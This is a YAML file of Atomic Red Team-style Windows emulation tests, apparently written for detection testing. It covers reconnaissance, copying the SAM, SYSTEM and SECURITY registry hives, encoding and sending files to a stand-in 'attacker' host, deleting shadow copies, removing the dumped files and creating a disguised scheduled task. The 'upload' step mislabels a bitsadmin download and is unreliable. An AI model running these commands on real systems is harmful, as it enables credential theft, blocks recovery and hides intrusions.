- attack_technique: T1082
  display_name: System Information Discovery
  atomic_tests:
    - name: LOLBin Recon with systeminfo/whoami
      executor:
        name: command_prompt
        command: |
          systeminfo
          whoami /priv
  description: |
    Use native Windows binaries to discover OS, patch level, and privilege context.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md

- attack_technique: T1003.002
  display_name: Dump SAM Database (Hive Access)
  atomic_tests:
    - name: Copy SAM and SYSTEM hive via cmd.exe
      executor:
        name: command_prompt
        command: |
          copy C:\Windows\System32\config\SAM %TEMP%\sam.bak
          copy C:\Windows\System32\config\SYSTEM %TEMP%\system.bak
  description: |
    Dump sensitive registry hives without admin tools using built-in copy command.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md

- attack_technique: T1555.003
  display_name: Credentials from Registry
  atomic_tests:
    - name: Extract secrets from SECURITY hive
      executor:
        name: command_prompt
        command: |
          copy C:\Windows\System32\config\SECURITY %TEMP%\security.bak
  description: |
    Collect registry hives for offline decryption of LSA secrets.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md

- attack_technique: T1041
  display_name: Exfiltration Over C2 Channel
  atomic_tests:
    - name: Encode file and simulate upload via certutil
      executor:
        name: command_prompt
        command: |
          certutil -encode %TEMP%\sam.bak sam.txt
  description: |
    Encode files to prep for stealth exfiltration using trusted binary.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md

- attack_technique: T1567.002
  display_name: Exfiltration to Web Service
  atomic_tests:
    - name: Simulate upload with certutil or BITSAdmin
      executor:
        name: command_prompt
        command: |
          bitsadmin /transfer exfil /download /priority high http://attacker/upload sam.txt
  description: |
    Abuse certutil or bitsadmin to simulate stealth file transfer to external server.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md

- attack_technique: T1490
  display_name: Inhibit System Recovery
  atomic_tests:
    - name: Delete Shadow Copies via vssadmin
      executor:
        name: command_prompt
        command: |
          vssadmin delete shadows /all /quiet
  description: |
    Destroy volume shadow copies with built-in administrative tool.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md

- attack_technique: T1222.001
  display_name: File and Directory Permissions Modification
  atomic_tests:
    - name: Verify ACL exposure on hives
      executor:
        name: command_prompt
        command: |
          icacls C:\Windows\System32\config\SAM
  description: |
    Confirm HiveNightmare vulnerable ACLs exist on sensitive system files.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md

- attack_technique: T1070.004
  display_name: File Deletion
  atomic_tests:
    - name: Remove dumped hive artifacts
      executor:
        name: command_prompt
        command: |
          del /f /q %TEMP%\sam.bak
          del /f /q %TEMP%\system.bak
          del /f /q %TEMP%\security.bak
  description: |
    Remove payloads and dumped artifacts post-operation using built-in deletion commands.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md

- attack_technique: T1053.005
  display_name: Scheduled Task Creation
  atomic_tests:
    - name: Schedule daily payload with schtasks.exe
      executor:
        name: command_prompt
        command: |
          schtasks /create /tn "WinUpdater" /tr "cmd /c run.bat" /sc daily /st 23:59
  description: |
    Maintain persistence through scheduled execution using LOLBin `schtasks.exe`.
  supported_platforms: [windows]
  atomic_red_team_link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md

